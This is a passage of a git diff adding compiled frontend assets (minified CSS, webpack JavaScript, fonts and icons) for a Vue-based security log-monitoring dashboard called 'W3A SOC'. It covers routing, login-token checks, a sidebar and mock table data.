.15s;width:30px}.viewer-list>li:focus,.viewer-list>li:hover{opacity:.75}.viewer-list>li:focus{outline:0}.viewer-list>li+li{margin-left:1px}.viewer-list>.viewer-loading{position:relative}.viewer-list>.viewer-loading:after{border-width:2px;height:20px;margin-left:-10px;margin-top:-10px;width:20px}.viewer-list>.viewer-active,.viewer-list>.viewer-active:focus,.viewer-list>.viewer-active:hover{opacity:1}.viewer-player{background-color:#000;bottom:0;cursor:none;display:none;right:0;z-index:1}.viewer-player,.viewer-player>img{left:0;position:absolute;top:0}.viewer-toolbar>ul{display:inline-block;margin:0 auto 5px;overflow:hidden;padding:6px 3px}.viewer-toolbar>ul>li{background-color:rgba(0,0,0,.5);border-radius:50%;cursor:pointer;float:left;height:24px;overflow:hidden;-webkit-transition:background-color .15s;transition:background-color .15s;width:24px}.viewer-toolbar>ul>li:focus,.viewer-toolbar>ul>li:hover{background-color:rgba(0,0,0,.8)}.viewer-toolbar>ul>li:focus{-webkit-box-shadow:0 0 3px #fff;box-shadow:0 0 3px #fff;outline:0;position:relative;z-index:1}.viewer-toolbar>ul>li:before{margin:2px}.viewer-toolbar>ul>li+li{margin-left:1px}.viewer-toolbar>ul>.viewer-small{height:18px;margin-bottom:3px;margin-top:3px;width:18px}.viewer-toolbar>ul>.viewer-small:before{margin:-1px}.viewer-toolbar>ul>.viewer-large{height:30px;margin-bottom:-3px;margin-top:-3px;width:30px}.viewer-toolbar>ul>.viewer-large:before{margin:5px}.viewer-tooltip{background-color:rgba(0,0,0,.8);border-radius:10px;color:#fff;display:none;font-size:12px;height:20px;left:50%;line-height:20px;margin-left:-25px;margin-top:-10px;position:absolute;text-align:center;top:50%;width:50px}.viewer-title{color:#ccc;display:inline-block;font-size:12px;line-height:1.2;margin:0 5% 5px;max-width:90%;opacity:.8;overflow:hidden;text-overflow:ellipsis;-webkit-transition:opacity .15s;transition:opacity .15s;white-space:nowrap}.viewer-title:hover{opacity:1}.viewer-button{-webkit-app-region:no-drag;background-color:rgba(0,0,0,.5);border-radius:50%;cursor:pointer;height:80px;overflow:hidden;position:absolute;right:-40px;top:-40px;-webkit-transition:background-color .15s;transition:background-color .15s;width:80px}.viewer-button:focus,.viewer-button:hover{background-color:rgba(0,0,0,.8)}.viewer-button:focus{-webkit-box-shadow:0 0 3px #fff;box-shadow:0 0 3px #fff;outline:0}.viewer-button:before{bottom:15px;left:15px;position:absolute}.viewer-fixed{position:fixed}.viewer-open{overflow:hidden}.viewer-show{display:block}.viewer-hide{display:none}.viewer-backdrop{background-color:rgba(0,0,0,.5)}.viewer-invisible{visibility:hidden}.viewer-move{cursor:move;cursor:-webkit-grab;cursor:grab}.viewer-fade{opacity:0}.viewer-in{opacity:1}.viewer-transition{-webkit-transition:all .3s;transition:all .3s}@-webkit-keyframes viewer-spinner{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes viewer-spinner{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.viewer-loading:after{-webkit-animation:viewer-spinner 1s linear infinite;animation:viewer-spinner 1s linear infinite;border:4px solid hsla(0,0%,100%,.1);border-left-color:hsla(0,0%,100%,.5);border-radius:50%;content:"";display:inline-block;height:40px;left:50%;margin-left:-20px;margin-top:-20px;position:absolute;top:50%;width:40px;z-index:1}@media (max-width:767px){.viewer-hide-xs-down{display:none}}@media (max-width:991px){.viewer-hide-sm-down{display:none}}@media (max-width:1199px){.viewer-hide-md-down{display:none}} \ No newline at end of file diff --git a/frontend/dist/static/fonts/element-icons.535877f5.woff b/frontend/dist/static/fonts/element-icons.535877f5.woff new file mode 100644 index 0000000..02b9a25 Binary files /dev/null and b/frontend/dist/static/fonts/element-icons.535877f5.woff differ diff --git a/frontend/dist/static/fonts/element-icons.732389de.ttf b/frontend/dist/static/fonts/element-icons.732389de.ttf new file mode 100644 index 0000000..91b74de Binary files /dev/null and b/frontend/dist/static/fonts/element-icons.732389de.ttf differ diff --git a/frontend/dist/static/fonts/fontello.068ca2b3.ttf b/frontend/dist/static/fonts/fontello.068ca2b3.ttf new file mode 100644 index 0000000..fcc3b30 Binary files /dev/null and b/frontend/dist/static/fonts/fontello.068ca2b3.ttf differ diff --git a/frontend/dist/static/fonts/fontello.8d4a4e6f.woff2 b/frontend/dist/static/fonts/fontello.8d4a4e6f.woff2 new file mode 100644 index 0000000..957d053 Binary files /dev/null and b/frontend/dist/static/fonts/fontello.8d4a4e6f.woff2 differ diff --git a/frontend/dist/static/fonts/fontello.a782baa8.woff b/frontend/dist/static/fonts/fontello.a782baa8.woff new file mode 100644 index 0000000..9844453 Binary files /dev/null and b/frontend/dist/static/fonts/fontello.a782baa8.woff differ diff --git a/frontend/dist/static/fonts/fontello.e73a0647.eot b/frontend/dist/static/fonts/fontello.e73a0647.eot new file mode 100644 index 0000000..4f8bd82 Binary files /dev/null and b/frontend/dist/static/fonts/fontello.e73a0647.eot differ diff --git a/frontend/dist/static/img/404.a57b6f31.png b/frontend/dist/static/img/404.a57b6f31.png new file mode 100644 index 0000000..3d8e230 Binary files /dev/null and b/frontend/dist/static/img/404.a57b6f31.png differ diff --git a/frontend/dist/static/img/404_cloud.0f4bc32b.png b/frontend/dist/static/img/404_cloud.0f4bc32b.png new file mode 100644 index 0000000..c6281d0 Binary files /dev/null and b/frontend/dist/static/img/404_cloud.0f4bc32b.png differ diff --git a/frontend/dist/static/img/fontello.9354499c.svg b/frontend/dist/static/img/fontello.9354499c.svg new file mode 100644 index 0000000..01812b4 --- /dev/null +++ b/frontend/dist/static/img/fontello.9354499c.svg @@ -0,0 +1,72 @@ + + + +Copyright (C) 2017 by original authors @ fontello.com + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/frontend/dist/static/js/app.1c271f5d.js b/frontend/dist/static/js/app.1c271f5d.js new file mode 100644 index 0000000..bd3b00f --- /dev/null +++ b/frontend/dist/static/js/app.1c271f5d.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["app"],{0:function(e,t,n){e.exports=n("56d7")},"028b":function(e,t,n){"use strict";n("3f4d")},"0bf1":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-loudongsaomiao",use:"icon-loudongsaomiao-usage",viewBox:"0 0 1024 1024",content:''});c.a.add(s);t["default"]=s},1179:function(e,t,n){},"186a":function(e,t,n){"use strict";n("9df4")},"18f0":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-link",use:"icon-link-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},"25a3":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-website",use:"icon-website-usage",viewBox:"0 0 1024 1024",content:''});c.a.add(s);t["default"]=s},"2a3d":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-password",use:"icon-password-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},"30c3":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-example",use:"icon-example-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},3288:function(e,t,n){},"3f4d":function(e,t,n){},4360:function(e,t,n){"use strict";var a=n("2b0e"),i=n("2f62"),o=(n("b0c0"),{sidebar:function(e){return e.app.sidebar},device:function(e){return e.app.device},token:function(e){return e.user.token},avatar:function(e){return e.user.avatar},name:function(e){return e.user.name}}),c=o,s=n("a78e"),r=n.n(s),l={sidebar:{opened:!r.a.get("sidebarStatus")||!!+r.a.get("sidebarStatus"),withoutAnimation:!1},device:"desktop"},u={TOGGLE_SIDEBAR:function(e){e.sidebar.opened=!e.sidebar.opened,e.sidebar.withoutAnimation=!1,e.sidebar.opened?r.a.set("sidebarStatus",1):r.a.set("sidebarStatus",0)},CLOSE_SIDEBAR:function(e,t){r.a.set("sidebarStatus",0),e.sidebar.opened=!1,e.sidebar.withoutAnimation=t},TOGGLE_DEVICE:function(e,t){e.device=t}},d={toggleSideBar:function(e){var t=e.commit;t("TOGGLE_SIDEBAR")},closeSideBar:function(e,t){var n=e.commit,a=t.withoutAnimation;n("CLOSE_SIDEBAR",a)},toggleDevice:function(e,t){var n=e.commit;n("TOGGLE_DEVICE",t)}},h={namespaced:!0,state:l,mutations:u,actions:d},p=n("83d6"),m=n.n(p),f=m.a.showSettings,v=m.a.fixedHeader,b=m.a.sidebarLogo,g={showSettings:f,fixedHeader:v,sidebarLogo:b},w={CHANGE_SETTING:function(e,t){var n=t.key,a=t.value;e.hasOwnProperty(n)&&(e[n]=a)}},z={changeSetting:function(e,t){var n=e.commit;n("CHANGE_SETTING",t)}},M={namespaced:!0,state:g,mutations:w,actions:z},x=(n("d3b7"),"vue_admin_template_token");function H(){return r.a.get(x)}function y(){return r.a.remove(x)}n("a18c");var F=function(){return{token:H(),name:"",avatar:""}},k=F(),C={RESET_STATE:function(e){Object.assign(e,F())},SET_TOKEN:function(e,t){e.token=t},SET_NAME:function(e,t){e.name=t},SET_AVATAR:function(e,t){e.avatar=t}},_={resetToken:function(e){var t=e.commit;return new Promise((function(e){y(),t("RESET_STATE"),e()}))}},S={namespaced:!0,state:k,mutations:C,actions:_};a["default"].use(i["a"]);var O=new i["a"].Store({modules:{app:h,settings:M,user:S},getters:c});t["a"]=O},"47f1":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-table",use:"icon-table-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},"4b0f":function(e,t,n){var a=n("6374").default,i=n("448a").default;n("4d63"),n("ac1f"),n("2c3e"),n("25f0");var o=n("96eb"),c=n("8a60"),s=c.param2Obj,r=n("a0bc"),l=i(r);function u(){function e(e){return function(t){var n=null;if(e instanceof Function){var a=t.body,i=t.type,c=t.url;n=e({method:i,body:JSON.parse(a),query:s(c)})}else n=e;return o.mock(n)}}o.XHR.prototype.proxy_send=o.XHR.prototype.send,o.XHR.prototype.send=function(){this.custom.xhr&&(this.custom.xhr.withCredentials=this.withCredentials||!1,this.responseType&&(this.custom.xhr.responseType=this.responseType)),this.proxy_send.apply(this,arguments)};var t,n=a(l);try{for(n.s();!(t=n.n()).done;){var i=t.value;o.mock(new RegExp(i.url),i.type||"get",e(i.response))}}catch(c){n.e(c)}finally{n.f()}}e.exports={mocks:l,mockXHR:u}},"4df5":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-eye",use:"icon-eye-usage",viewBox:"0 0 128 64",content:''});c.a.add(s);t["default"]=s},"51ff":function(e,t,n){var a={"./assets.svg":"db03","./dashboard.svg":"f782","./example.svg":"30c3","./eye-open.svg":"d7ec","./eye.svg":"4df5","./form.svg":"eb1b","./link.svg":"18f0","./loudongsaomiao.svg":"0bf1","./nested.svg":"dcf8","./password.svg":"2a3d","./table.svg":"47f1","./tree.svg":"93cd","./user.svg":"b3b5","./website.svg":"25a3"};function i(e){var t=o(e);return n(t)}function o(e){if(!n.o(a,e)){var t=new Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return a[e]}i.keys=function(){return Object.keys(a)},i.resolve=o,e.exports=i,i.id="51ff"},"56d7":function(e,t,n){"use strict";n.r(t);n("e260"),n("e6cf"),n("cca6"),n("a79d");var a=n("2b0e"),i=(n("f5df1"),n("5c96")),o=n.n(i),c=(n("0fae"),n("f0d9")),s=n.n(c),r=(n("b20f"),function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{attrs:{id:"app"}},[n("router-view")],1)}),l=[],u={name:"App"},d=u,h=n("2877"),p=Object(h["a"])(d,r,l,!1,null,null,null),m=p.exports,f=n("4360"),v=n("a18c"),b=(n("d81d"),n("d3b7"),n("ddb0"),function(){var e=this,t=e.$createElement,n=e._self._c||t;return e.isExternal?n("div",e._g({staticClass:"svg-external-icon svg-icon",style:e.styleExternalIcon},e.$listeners)):n("svg",e._g({class:e.svgClass,attrs:{"aria-hidden":"true"}},e.$listeners),[n("use",{attrs:{"xlink:href":e.iconName}})])}),g=[],w=n("61f7"),z={name:"SvgIcon",props:{iconClass:{type:String,required:!0},className:{type:String,default:""}},computed:{isExternal:function(){return Object(w["a"])(this.iconClass)},iconName:function(){return"#icon-".concat(this.iconClass)},svgClass:function(){return this.className?"svg-icon "+this.className:"svg-icon"},styleExternalIcon:function(){return{mask:"url(".concat(this.iconClass,") no-repeat 50% 50%"),"-webkit-mask":"url(".concat(this.iconClass,") no-repeat 50% 50%")}}}},M=z,x=(n("68fa"),Object(h["a"])(M,b,g,!1,null,"f9f7fefc",null)),H=x.exports;a["default"].component("svg-icon",H);var y=n("51ff"),F=function(e){return e.keys().map(e)};F(y);var k=n("1da1"),C=(n("96cf"),n("323e")),_=n.n(C),S=(n("a5d8"),n("99af"),n("83d6")),O=n.n(S),E=O.a.title||"日志检测中心";function B(e){return e?"".concat(e," - ").concat(E):"".concat(E)}_.a.configure({showSpinner:!1});var V=["/login"];v["a"].beforeEach(function(){var e=Object(k["a"])(regeneratorRuntime.mark((function e(t,n,a){var i;return regeneratorRuntime.wrap((function(e){while(1)switch(e.prev=e.next){case 0:_.a.start(),document.title=B(t.meta.title),i=localStorage.getItem("token"),i&&"null"!=i?"/login"===t.path?(a({path:"/"}),_.a.done()):a():-1!==V.indexOf(t.path)?a():(a("/login?redirect=".concat(t.path)),_.a.done());case 4:case"end":return e.stop()}}),e)})));return function(t,n,a){return e.apply(this,arguments)}}()),v["a"].afterEach((function(){_.a.done()}));var T=n("313e"),$=n.n(T),L=n("2819"),A=n.n(L),j=n("9e3b"),P=n.n(j),I=n("b2d8"),D=n.n(I),N=(n("64e1"),n("6944")),R=n.n(N);n("0808");a["default"].use(R.a),R.a.setDefaults({Options:{inline:!0,button:!0,navbar:!1,title:!0,toolbar:!1,tooltip:!0,movable:!1,zoomable:!0,rotatable:!1,scalable:!1,transition:!1,fullscreen:!0,keyboard:!0,url:"data-source"}});var q=n("4b0f"),G=q.mockXHR;G(),a["default"].prototype.$echarts=$.a,a["default"].use(o.a,{locale:s.a}),a["default"].use(A.a),a["default"].use(P.a),a["default"].use(D.a),a["default"].config.productionTip=!1,new a["default"]({el:"#app",router:v["a"],store:f["a"],render:function(e){return e(m)}})},"61f7":function(e,t,n){"use strict";n.d(t,"a",(function(){return a}));n("ac1f"),n("00b4"),n("498a");function a(e){return/^(https?:|mailto:|tel:)/.test(e)}},"68fa":function(e,t,n){"use strict";n("eae4")},"6c3f":function(e,t,n){},"709d":function(e,t,n){},"83d6":function(e,t){e.exports={title:"W3A SOC",fixedHeader:!0,sidebarLogo:!0}},"8a60":function(e,t,n){function a(e){var t=decodeURIComponent(e.split("?")[1]).replace(/\+/g," ");if(!t)return{};var n={},a=t.split("&");return a.forEach((function(e){var t=e.indexOf("=");if(-1!==t){var a=e.substring(0,t),i=e.substring(t+1,e.length);n[a]=i}})),n}n("ac1f"),n("5319"),n("1276"),n("d3b7"),n("159b"),e.exports={param2Obj:a}},"93cd":function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-tree",use:"icon-tree-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},9874:function(e,t,n){},"9d28":function(e,t,n){"use strict";n("3288")},"9df4":function(e,t,n){},"9f2b":function(e,t,n){"use strict";n("709d")},a0bc:function(e,t,n){var a=n("96eb"),i=a.mock({"items|30":[{id:"@id",title:"@sentence(10, 20)","status|1":["published","draft","deleted"],author:"name",display_time:"@datetime",pageviews:"@integer(300, 5000)"}]});e.exports=[{url:"/vue-admin-template/table/list",type:"get",response:function(e){var t=i.items;return{code:2e4,data:{total:t.length,items:t}}}}]},a18c:function(e,t,n){"use strict";n("d3b7"),n("3ca3"),n("ddb0");var a,i,o=n("2b0e"),c=n("8c4f"),s=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticClass:"app-wrapper",class:e.classObj},["mobile"===e.device&&e.sidebar.opened?n("div",{staticClass:"drawer-bg",on:{click:e.handleClickOutside}}):e._e(),n("sidebar",{staticClass:"sidebar-container"}),n("div",{staticClass:"main-container"},[n("div",{class:{"fixed-header":e.fixedHeader}},[n("navbar")],1),n("app-main")],1)],1)},r=[],l=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticClass:"navbar"},[n("hamburger",{staticClass:"hamburger-container",attrs:{"is-active":e.sidebar.opened},on:{toggleClick:e.toggleSideBar}}),n("breadcrumb",{staticClass:"breadcrumb-container"}),n("div",{staticClass:"right-menu"},[n("el-dropdown",{staticClass:"avatar-container",attrs:{trigger:"click"}},[n("div",{staticClass:"avatar-wrapper"},[n("img",{staticClass:"user-avatar",attrs:{src:"http://www.aidolphins.com/logo.png"}}),n("i",{staticClass:"el-icon-caret-bottom"})]),n("el-dropdown-menu",{staticClass:"user-dropdown",attrs:{slot:"dropdown"},slot:"dropdown"},[n("el-dropdown-item",{nativeOn:{click:function(t){return e.tabs(t)}}},[e._v("切换应用")]),n("el-dropdown-item",{nativeOn:{click:function(t){return e.logout(t)}}},[e._v("退出")])],1)],1)],1)],1)},u=[],d=n("5530"),h=n("2f62"),p=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("el-breadcrumb",{staticClass:"app-breadcrumb",attrs:{separator:"/"}},[n("transition-group",{attrs:{name:"breadcrumb"}},e._l(e.levelList,(function(t,a){return n("el-breadcrumb-item",{key:t.path},["noRedirect"===t.redirect||a==e.levelList.length-1?n("span",{staticClass:"no-redirect"},[e._v(e._s(t.meta.title))]):n("span",[e._v(e._s(t.meta.title))])])})),1)],1)},m=[],f=(n("4de4"),n("b0c0"),n("498a"),n("bd11")),v=n.n(f),b={data:function(){return{levelList:null}},watch:{$route:function(){this.getBreadcrumb()}},created:function(){this.getBreadcrumb()},methods:{getBreadcrumb:function(){var e=this.$route.matched.filter((function(e){return e.meta&&e.meta.title}));e[0];this.levelList=e.filter((function(e){return e.meta&&e.meta.title&&!1!==e.meta.breadcrumb}))},isDashboard:function(e){var t=e&&e.name;return!!t&&t.trim().toLocaleLowerCase()==="Dashboard".toLocaleLowerCase()},pathCompile:function(e){var t=this.$route.params,n=v.a.compile(e);return n(t)},handleLink:function(e){var t=e.redirect,n=e.path;t?this.$router.push(t):this.$router.push(this.pathCompile(n))}}},g=b,w=(n("c75e"),n("2877")),z=Object(w["a"])(g,p,m,!1,null,"09ba5680",null),M=z.exports,x=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticStyle:{padding:"0 15px"},on:{click:e.toggleClick}},[n("svg",{staticClass:"hamburger",class:{"is-active":e.isActive},attrs:{viewBox:"0 0 1024 1024",xmlns:"http://www.w3.org/2000/svg",width:"64",height:"64"}},[n("path",{attrs:{d:"M408 442h480c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8H408c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8zm-8 204c0 4.4 3.6 8 8 8h480c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8H408c-4.4 0-8 3.6-8 8v56zm504-486H120c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 632H120c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h784c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM142.4 642.1L298.7 519a8.84 8.84 0 0 0 0-13.9L142.4 381.9c-5.8-4.6-14.4-.5-14.4 6.9v246.3a8.9 8.9 0 0 0 14.4 7z"}})])])},H=[],y={name:"Hamburger",props:{isActive:{type:Boolean,default:!1}},methods:{toggleClick:function(){this.$emit("toggleClick")}}},F=y,k=(n("186a"),Object(w["a"])(F,x,H,!1,null,"49e15297",null)),C=k.exports,_={components:{Breadcrumb:M,Hamburger:C},computed:Object(d["a"])({},Object(h["b"])(["sidebar","avatar"])),methods:{toggleSideBar:function(){this.$store.dispatch("app/toggleSideBar")},logout:function(){localStorage.removeItem("token"),this.$router.push("/login")},tabs:function(){localStorage.removeItem("websiteDomain"),this.$router.push("/tab")}}},S=_,O=(n("aef8"),Object(w["a"])(S,l,u,!1,null,"43d1048f",null)),E=O.exports,B=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{class:{"has-logo":e.showLogo}},[e.showLogo?n("logo",{attrs:{collapse:e.isCollapse}}):e._e(),n("el-scrollbar",{attrs:{"wrap-class":"scrollbar-wrapper"}},[n("el-menu",{attrs:{"default-active":e.activeMenu,collapse:e.isCollapse,"background-color":e.variables.menuBg,"text-color":e.variables.menuText,"unique-opened":!0,"active-text-color":e.variables.menuActiveText,"collapse-transition":!1,mode:"vertical"}},e._l(e.routes,(function(e){return n("sidebar-item",{key:e.path,attrs:{item:e,"base-path":e.path}})})),1)],1)],1)},V=[],T=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n("div",{staticClass:"sidebar-logo-container",class:{collapse:e.collapse}},[n("transition",{attrs:{name:"sidebarLogoFade"}},[e.collapse?n("router-link",{key:"collapse",staticClass:"sidebar-logo-link",attrs:{to:"/tab"}},[e.logo?n("img",{staticClass:"sidebar-logo",attrs:{src:e.logo}}):n("h1",{staticClass:"sidebar-title"},[e._v(e._s(e.title))])]):n("router-link",{key:"expand",staticClass:"sidebar-logo-link",attrs:{to:"/tab"}},[e.logo?n("img",{staticClass:"sidebar-logo",attrs:{src:e.logo}}):e._e(),n("h1",{staticClass:"sidebar-title"},[e._v(e._s(e.title))])])],1)],1)},$=[],L={name:"SidebarLogo",props:{collapse:{type:Boolean,required:!0}},data:function(){return{title:localStorage.getItem("websiteName"),logo:"http://www.aidolphins.com/logo.png"}}},A=L,j=(n("9d28"),Object(w["a"])(A,T,$,!1,null,"a0bdae54",null)),P=j.exports,I=function(){var e=this,t=e.$createElement,n=e._self._c||t;return e.item.hidden?e._e():n("div",[!e.hasOneShowingChild(e.item.children,e.item)||e.onlyOneChild.children&&!e.onlyOneChild.noShowingChildren||e.item.alwaysShow?n("el-submenu",{ref:"subMenu",attrs:{index:e.resolvePath(e.item.path),"popper-append-to-body":""}},[n("template",{slot:"title"},[e.item.meta?n("item",{attrs:{icon:e.item.meta&&e.item.meta.icon,title:e.item.meta.title}}):e._e()],1),e._l(e.item.children,(function(t){return n("sidebar-item",{key:t.path,staticClass:"nest-menu",attrs:{"is-nest":!0,item:t,"base-path":e.resolvePath(t.path)}})}))],2):[e.onlyOneChild.meta?n("app-link",{attrs:{to:e.resolvePath(e.onlyOneChild.path)}},[n("el-menu-item",{class:{"submenu-title-noDropdown":!e.isNest},attrs:{index:e.resolvePath(e.onlyOneChild.path)}},[n("item",{attrs:{icon:e.onlyOneChild.meta.icon||e.item.meta&&e.item.meta.icon,title:e.onlyOneChild.meta.title}})],1)],1):e._e()]],2)},D=[],N=n("df7c"),R=n.n(N),q=n("61f7"),G=(n("caad"),n("2532"),{name:"MenuItem",functional:!0,props:{icon:{type:String,default:""},title:{type:String,default:""}},render:function(e,t){var n=t.props,a=n.icon,i=n.title,o=[];return a&&(a.includes("el-icon")?o.push(e("i",{class:[a,"sub-el-icon"]})):o.push(e("svg-icon",{attrs:{"icon-class":a}}))),i&&o.push(e("span",{slot:"title"},[i])),o}}),W=G,X=(n("bf4f"),Object(w["a"])(W,a,i,!1,null,"18eeea00",null)),U=X.exports,J=function(){var e=this,t=e.$createElement,n=e._self._c||t;return n(e.type,e._b({tag:"component"},"component",e.linkProps(e.to),!1),[e._t("default")],2)},K=[],Q={props:{to:{type:String,required:!0}},computed:{isExternal:function(){return Object(q["a"])(this.to)},type:function(){return this.isExternal?"a":"router-link"}},methods:{linkProps:function(e){return this.isExternal?{href:e,target:"_blank",rel:"noopener"}:{to:e}}}},Y=Q,Z=Object(w["a"])(Y,J,K,!1,null,null,null),ee=Z.exports,te={computed:{device:function(){return this.$store.state.app.device}},mounted:function(){this.fixBugIniOS()},methods:{fixBugIniOS:function(){var e=this,t=this.$refs.subMenu;if(t){var n=t.handleMouseleave;t.handleMouseleave=function(t){"mobile"!==e.device&&n(t)}}}}},ne={name:"SidebarItem",components:{Item:U,AppLink:ee},mixins:[te],props:{item:{type:Object,required:!0},isNest:{type:Boolean,default:!1},basePath:{type:String,default:""}},data:function(){return this.onlyOneChild=null,{}},methods:{hasOneShowingChild:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:[],n=arguments.length>1?arguments[1]:void 0,a=t.filter((function(t){return!t.hidden&&(e.onlyOneChild=t,!0)}));return 1===a.length||0===a.length&&(this.onlyOneChild=Object(d["a"])(Object(d["a"])({},n),{},{path:"",noShowingChildren:!0}),!0)},resolvePath:function(e){return Object(q["a"])(e)?e:Object(q["a"])(this.basePath)?this.basePath:R.a.resolve(this.basePath,e)}}},ae=ne,ie=Object(w["a"])(ae,I,D,!1,null,null,null),oe=ie.exports,ce=n("cf1e"),se=n.n(ce),re={components:{SidebarItem:oe,Logo:P},computed:Object(d["a"])(Object(d["a"])({},Object(h["b"])(["sidebar"])),{},{routes:function(){for(var e=localStorage.getItem("roles"),t=[],n=0;n'});c.a.add(s);t["default"]=s},bf4f:function(e,t,n){"use strict";n("9874")},c75e:function(e,t,n){"use strict";n("6c3f")},c763:function(e,t,n){},cf1e:function(e,t,n){e.exports={menuText:"#bfcbd9",menuActiveText:"#409eff",subMenuActiveText:"#f4f4f5",menuBg:"#304156",menuHover:"#263445",subMenuBg:"#1f2d3d",subMenuHover:"#001528",sideBarWidth:"210px"}},d7ec:function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-eye-open",use:"icon-eye-open-usage",viewBox:"0 0 1024 1024",content:''});c.a.add(s);t["default"]=s},db03:function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-assets",use:"icon-assets-usage",viewBox:"0 0 1024 1024",content:''});c.a.add(s);t["default"]=s},dcf8:function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-nested",use:"icon-nested-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},e4de:function(e,t,n){"use strict";n("c763")},eae4:function(e,t,n){},eb1b:function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-form",use:"icon-form-usage",viewBox:"0 0 128 128",content:''});c.a.add(s);t["default"]=s},f782:function(e,t,n){"use strict";n.r(t);var a=n("e017"),i=n.n(a),o=n("21a1"),c=n.n(o),s=new i.a({id:"icon-dashboard",use:"icon-dashboard-usage",viewBox:"0 0 128 100",content:''});c.a.add(s);t["default"]=s}},[[0,"runtime","chunk-elementUI","chunk-libs"]]]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-032a9cb0.95777aac.js b/frontend/dist/static/js/chunk-032a9cb0.95777aac.js new file mode 100644 index 0000000..066a832 --- /dev/null +++ b/frontend/dist/static/js/chunk-032a9cb0.95777aac.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-032a9cb0"],{1937:function(e,t,a){},"333d":function(e,t,a){"use strict";var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[a("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},r=[];a("a9e3");Math.easeInOutQuad=function(e,t,a,n){return e/=n/2,e<1?a/2*e*e+t:(e--,-a/2*(e*(e-2)-1)+t)};var i=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function s(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function o(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function c(e,t,a){var n=o(),r=e-n,c=20,l=0;t="undefined"===typeof t?500:t;var u=function e(){l+=c;var o=Math.easeInOutQuad(l,n,r,t);s(o),l2)if(l=h(l),t=l.charCodeAt(0),43===t||45===t){if(a=l.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(l.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+l}for(i=l.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+l};if(i(b,!w(" 0o1")||!w("0b1")||w("+0x1"))){for(var C,_=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof _&&(v?d((function(){y.valueOf.call(a)})):c(a)!=b)?l(new 